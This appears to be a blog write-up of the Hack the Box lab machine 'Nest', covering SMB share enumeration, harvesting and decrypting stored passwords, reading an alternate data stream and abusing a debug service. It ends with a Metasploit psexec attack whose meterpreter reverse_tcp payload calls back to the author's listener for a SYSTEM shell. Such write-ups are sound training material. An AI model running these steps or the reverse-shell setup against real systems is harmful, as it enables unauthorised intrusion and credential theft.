This is one of my favorite Hack the Box machines, throughout my time completing them! I absolutely enjoyed every minute of this box.
My first NMAP scan, running with multiple flags, failed. I performed a simple nmap scan, and it returned only one port open:
123456789nmap 10.10.10.178 Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 09:25 CST Nmap scan report for 10.10.10.178 Host is up (0.043s latency). Not shown: 999 filtered ports PORT STATE SERVICE 445/tcp open microsoft-ds Nmap done: 1 IP address (1 host up) scanned in 5.41 seconds
In the above, with port 445 open, I then ran a scan against SMB. Server Message Block (also known as Samba) is a way for Windows to share files, printers, serial ports and communications abstractions such as named pipes and mail slots between computers.
123456789101112smbclient -L //10.10.10.178Enter WORKGROUP\root's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share Data Disk IPC$ IPC Remote IPC Secure$ Disk Users Disk SMB1 disabled -- no workgroup available
The smbclient command showed that there were several network shares. Smbclient is a tool used for Samba, providing a ftp-like experience for users. I went through and connected to each, and found that I was able to login and find possible Usernames in the Users share. I took note of this, as this information is sure to come up later for this box:
12345678910111213smbclient \\\\10.10.10.178\\UsersEnter WORKGROUP\root's password: smb: \> dir . D 0 Sat Jan 25 17:04:21 2020 .. D 0 Sat Jan 25 17:04:21 2020 Administrator D 0 Fri Aug 9 10:08:23 2019 C.Smith D 0 Sun Jan 26 01:21:44 2020 L.Frost D 0 Thu Aug 8 12:03:01 2019 R.Thompson D 0 Thu Aug 8 12:02:50 2019 TempUser D 0 Wed Aug 7 17:55:56 2019 10485247 blocks of size 4096. 6449754 blocks available
I did attempt to access the user share listed, but access was denied for each of the directories. Continuing my enumeration of the network shares, I connected to Data, and found I could login to the Shared directory:
123456789101112131415161718192021smbclient \\\\10.10.10.178\\DataEnter WORKGROUP\root's password: Try "help" to get a list of possible commands.smb: \> dir . D 0 Wed Aug 7 17:53:46 2019 .. D 0 Wed Aug 7 17:53:46 2019 IT D 0 Wed Aug 7 17:58:07 2019 Production D 0 Mon Aug 5 16:53:38 2019 Reports D 0 Mon Aug 5 16:53:44 2019 Shared D 0 Wed Aug 7 14:07:51 2019 10485247 blocks of size 4096. 6449754 blocks availablesmb: \Reports\> cd ..\Sharedsmb: \Shared\> dir . D 0 Wed Aug 7 14:07:51 2019 .. D 0 Wed Aug 7 14:07:51 2019 Maintenance D 0 Wed Aug 7 14:07:32 2019 Templates D 0 Wed Aug 7 14:08:07 2019 10485247 blocks of size 4096. 6449754 blocks available
In this directory, I found a file, Maintenance Alerts.txt. I used the get command to downlaod the file to my local box, and on my Kali Linux viewed the file:
12345678910111213smb: \Shared\Maintenance\> dir . D 0 Wed Aug 7 14:07:32 2019 .. D 0 Wed Aug 7 14:07:32 2019 Maintenance Alerts.txt A 48 Mon Aug 5 18:01:44 2019 10485247 blocks of size 4096. 6449754 blocks available smb: \Shared\Maintenance\> get "Maintenance Alerts.txt"getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)root@bhax0r:~# cat 'Maintenance Alerts.txt'There is currently no scheduled maintenance work
However, still nothing! I then went up one directory, and logged into the Templates directory and found another file, Welcome Email.txt. This sounded promising:
1234567891011121314151617181920212223242526smb: \Shared\Templates\HR\> dir . D 0 Wed Aug 7 14:08:01 2019 .. D 0 Wed Aug 7 14:08:01 2019 Welcome Email.txt A 425 Wed Aug 7 17:55:36 2019 10485247 blocks of size 4096. 6449754 blocks availablesmb: \Shared\Templates\HR\> get "Welcome Email.txt"getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (2.4 KiloBytes/sec) (average 0.9 KiloBytes/sec)root@hax0r:~# cat 'Welcome Email.txt' We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>You will find your home folder in the following location: \\HTB-NEST\Users\<USERNAME>If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you.Username: TempUserPassword: welcome2019Thank you
And I found a possible set of credentials, tempuser:welcome2019! Noting the Users directory earlier, I logged back in with these credentials to that network share:
1234567891011121314151617smbclient \\\\10.10.10.178\\Users -U TempUserEnter WORKGROUP\TempUser's password: Try "help" to get a list of possible commands.smb: \> cd TempUsersmb: \TempUser\> dir . D 0 Wed Aug 7 17:55:56 2019 .. D 0 Wed Aug 7 17:55:56 2019 New Text Document.txt A 0 Wed Aug 7 17:55:56 2019 10485247 blocks of size 4096. 6449754 blocks available smb: \TempUser\> get "New Text Document.txt"getting file \TempUser\New Text Document.txt of size 0 as New Text Document.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)root@hax0r:~# cat 'New Text Document.txt'
However, this did not have any further information for me. I then attempted to login to the Users share with the other usernames, using the same password (users don’t always change default passwords) but this approach also did not work. So, I moved on and used these credentials agaisnt other shares. I did find that it allowed me into Secure$:
123456789101112smbclient \\\\10.10.10.178\\Secure$ -U TempUserEnter WORKGROUP\TempUser's password: Try "help" to get a list of possible commands.smb: \> dir . D 0 Wed Aug 7 18:08:12 2019 .. D 0 Wed Aug 7 18:08:12 2019 Finance D 0 Wed Aug 7 14:40:13 2019 HR D 0 Wed Aug 7 18:08:11 2019 IT D 0 Thu Aug 8 05:59:25 2019 10485247 blocks of size 4096. 6449738 blocks available
But, there was nothing within that network share that I could use to my advantage. Moving on, I was able to log into the Data share with the tempuser credentials. I was able to find two interesting files in this share, RU_config.xml and config.xml:
1234567891011121314151617 smb: \IT\Configs\RU Scanner\> ls . D 0 Wed Aug 7 15:01:13 2019 .. D 0 Wed Aug 7 15:01:13 2019 RU_config.xml A 270 Thu Aug 8 14:49:37 2019 10485247 blocks of size 4096. 6449935 blocks availablesmb: \IT\Configs\RU Scanner\> get RU_config.xml getting file \IT\Configs\RU Scanner\RU_config.xml of size 270 as RU_config.xml (1.5 KiloBytes/sec) (average 17.6 KiloBytes/sec)root@hax0r:~# cat RU_config.xml <?xml version="1.0"?> <ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <Port>389</Port> <Username>c.smith</Username> <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password></ConfigFile>
12345678910111213141516171819smb: \IT\Configs\NotepadPlusPlus\> ls . D 0 Wed Aug 7 14:31:37 2019 .. D 0 Wed Aug 7 14:31:37 2019 config.xml A 6451 Wed Aug 7 18:01:25 2019 shortcuts.xml A 2108 Wed Aug 7 14:30:27 2019 10485247 blocks of size 4096. 6449935 blocks availablesmb: \IT\Configs\NotepadPlusPlus\> get config.xml getting file \IT\Configs\NotepadPlusPlus\config.xml of size 6451 as config.xml (37.5 KiloBytes/sec) (average 23.4 KiloBytes/sec)root@hax0r:~# cat config.xml...<History nbMaxFile="15" inSubMenu="no" customLength="-1"> <File filename="C:\windows\System32\drivers\etc\hosts" /> <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" /> <File filename="C:\Users\C.Smith\Desktop\todo.txt" /> </History>...
Neither of these looked like much at first, but there is relevant and important information. FIrst off, we have a username and password from the RU_config.xml. The second can be easily missed, and this is the second File filename variable in config.xml. I can see that in the network share Secure$, there is a Carl directory within the IT directory. In the RU_config.xml, there is a c.smith password, can this be Carl!?
I logged in and attempted to see if I could get to the Carl directory:
123456789101112131415161718192021smbclient \\\\10.10.10.178\\Secure$ -U TempUser Enter WORKGROUP\TempUser's password: welcome2019Try "help" to get a list of possible commands. smb: \> dir . D 0 Wed Aug 7 18:08:12 2019 .. D 0 Wed Aug 7 18:08:12 2019 Finance D 0 Wed Aug 7 14:40:13 2019 HR D 0 Wed Aug 7 18:08:11 2019 IT D 0 Thu Aug 8 05:59:25 2019 10485247 blocks of size 4096. 6449738 blocks available smb: \> cd IT smb: \IT\> dir NT_STATUS_ACCESS_DENIED listing \IT\* smb: \IT\> cd Carl smb: \IT\Carl\> dir . D 0 Wed Aug 7 14:42:14 2019 .. D 0 Wed Aug 7 14:42:14 2019 Docs D 0 Wed Aug 7 14:44:00 2019 Reports D 0 Tue Aug 6 08:45:40 2019 VB Projects D 0 Tue Aug 6 09:41:55 2019
And that worked! Note above, that when I was in the Secure$\IT directory, I could not list the contents. However, I could still change into the Carl directory. Awesome! Enumerating these files, I found a RUScanner in VB Projects direcory:
1234567891011121314 smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> dir . D 0 Wed Aug 7 17:05:54 2019 .. D 0 Wed Aug 7 17:05:54 2019 bin D 0 Wed Aug 7 15:00:11 2019 ConfigFile.vb A 772 Wed Aug 7 17:05:09 2019 Module1.vb A 279 Wed Aug 7 17:05:44 2019 My Project D 0 Wed Aug 7 15:00:11 2019 obj D 0 Wed Aug 7 15:00:11 2019 RU Scanner.vbproj A 4828 Fri Aug 9 10:37:51 2019 RU Scanner.vbproj.user A 143 Tue Aug 6 07:55:27 2019 SsoIntegration.vb A 133 Wed Aug 7 17:05:58 2019 Utils.vb A 4888 Wed Aug 7 14:49:35 2019 10485247 blocks of size 4096. 6449951 blocks available'
Looking at the Utils.vb file, there are encrypting and decrypting functions. Looking at how these functions work, there is reference to symmetric key creation, using Rfc2898DeriveBytes. Instead of trying to break this encryption, I took the complete file structure, and copied to a Windows machine. Once I had it locally, I was able to compile the code using Visual Studio.
Once compiled and I attempted to run the file, there was an error message:
1Unhandled Exception: System.IO.FileNotFoundException: Could not find file 'C:\Users\adalzell\Desktop\Nest\RUScanner\bin\Debug\RU_Config.xml'
Having RU_config.xml file, which contains the hash string that looked like base 64, I placed that file into the directory, and when I ran it, the program ran without any exception errors. I then placed a single line of code to write to console the Plain Text in the Utils.vb decrypt function:
12345Public Shared Function Decrypt(ByVal cipherText As String, _... Console.WriteLine(plainText) Return plainText...
And with that, when I compiled the code again, I could see the plain text password:
Now, I am able to connect to the Users share and own user:
1234567891011121314151617smbclient \\\\10.10.10.178\\Users -U C.SmithEnter WORKGROUP\C.Smith's password: xRxRxPANCAK3SxRxRxsmb: \> cd C.Smithsmb: \C.Smith\> ls . D 0 Sun Jan 26 01:21:44 2020 .. D 0 Sun Jan 26 01:21:44 2020 HQK Reporting D 0 Thu Aug 8 18:06:17 2019 user.txt A 32 Thu Aug 8 18:05:24 2019 10485247 blocks of size 4096. 6449757 blocks availablesmb: \C.Smith\> get user.txtgetting file \C.Smith\user.txt of size 32 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)root@hax0r:~# cat user.txt xxxxxxxxxxxxxxx4fd827e05f426e987
Now to move on to own root. I looked in the HQK Reporting directory, and found a password file:
12345678smb: \C.Smith\HQK Reporting\> ls . D 0 Thu Aug 8 18:06:17 2019 .. D 0 Thu Aug 8 18:06:17 2019 AD Integration Module D 0 Fri Aug 9 07:18:42 2019 Debug Mode Password.txt A 0 Thu Aug 8 18:08:17 2019 HQK_Config_Backup.xml A 249 Thu Aug 8 18:09:05 2019 10485247 blocks of size 4096. 6449725 blocks available
But, it was empty. That would have been to easy! However, looking at the file attributes, there is a stream associated to it, so I copied of the Alternate Data Stream (ADS) to get the password file:
123456789101112131415smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"altname: DEBUGM~1.TXTcreate_time: Thu Aug 8 06:06:12 PM 2019 CDTaccess_time: Thu Aug 8 06:06:12 PM 2019 CDTwrite_time: Thu Aug 8 06:08:17 PM 2019 CDTchange_time: Thu Aug 8 06:08:17 PM 2019 CDTattributes: A (20)stream: [::$DATA], 0 bytesstream: [:Password:$DATA], 15 bytessmb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt:Password"root@hax0r:~# cat "/root/Debug Mode Password.txt:Password" WBQ201953D8w
With this password, I can telnet into the box and enable Debug:
12345678910telnet 10.10.10.178 4386Trying 10.10.10.178...Connected to 10.10.10.178.Escape character is '^]'.HQK Reporting Service V1.2>debug WBQ201953D8wDebug mode enabled. Use the HELP command to view additional commands that are now available
Still connected with this telnet session, I enumerated and going up one directory, in the LDAP directory, I found a config file:
1234567891011121314151617>list Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command QUERY FILES IN CURRENT DIRECTORY[1] HqkLdap.exe[2] Ldap.confCurrent Directory: LDAP>showquery 2Domain=nest.localPort=389BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=localUser=AdministratorPassword=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
Using the RU_config.xml I attempted to decrypt returned a padding error. Looking further into the KqdLdap.exe, I found the following code in the CR function:
12345678' HqkLdap.CR' Token: 0x06000012 RID: 18 RVA: 0x00002278 File Offset: 0x00000678Public Shared Function DS(EncryptedString As String) As String If String.IsNullOrEmpty(EncryptedString) Then Return String.Empty End If Return CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256)End Function
This is a different set of encryption, different IV, string, and iteration. So, I placed this into the Decryption function of DbPof.exe, and with the administrator hash in the RU_config.xml file, I reran the DbProf.exe program from command prompt, and got the administrator password!
12DbPof.exeXtH4nkS4Pl4y1nGX
I connected to SMB Share, but there was a shortcut link to the admins desktop. This was no good. So, I used metasploit (after multiple failed attempts with evil-winrm, impacket psexec.py, and winexec) psexec with reverse_tcp payload:
1234567891011121314151617181920212223242526272829303132333435363738394041424344msf5 > use exploit/windows/smb/psexecmsf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcp msf5 exploit(windows/smb/psexec) > set LHOST 10.10.14.13LHOST => 10.10.14.13msf5 exploit(windows/smb/psexec) > set LPORT 4538LPORT => 4538msf5 exploit(windows/smb/psexec) > set RHOSTS 10.10.10.178RHOSTS => 10.10.10.178msf5 exploit(windows/smb/psexec) > set SMBUserSMBUser => msf5 exploit(windows/smb/psexec) > set SMBUser AdministratorSMBUser => Administratormsf5 exploit(windows/smb/psexec) > set SMBPass XtH4nkS4Pl4y1nGXSMBPass => XtH4nkS4Pl4y1nGXmsf5 exploit(windows/smb/psexec) > exploit[*] Started reverse TCP handler on 10.10.14.13:4538 [*] 10.10.10.178:445 - Connecting to the server...[*] 10.10.10.178:445 - Authenticating to 10.10.10.178:445 as user 'Administrator'...[*] 10.10.10.178:445 - Selecting PowerShell target[*] 10.10.10.178:445 - Executing the payload...[+] 10.10.10.178:445 - Service start timed out, OK if running a command or non-service executable...[*] Sending stage (180291 bytes) to 10.10.10.178[*] Meterpreter session 1 opened (10.10.14.13:4538 -> 10.10.10.178:49157) at 2020-01-29 14:28:29 -0600meterpreter > shellProcess 1456 created.Channel 1 created.Microsoft Windows [Version 6.1.7601]Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\Windows\system32>whoamiwhoamint authority\systemC:\Windows\system32>cd C:\users\administrator\desktopcd C:\users\administrator\desktopC:\Users\Administrator\Desktop>more root.txtmore root.txtxxxxxxxxxxxxxxxxxxx08a42f0b94b878c41
And rooted this box! The name, Nest, really fits this complex set of steps, nesting each step to proceed. Thanks for reading!
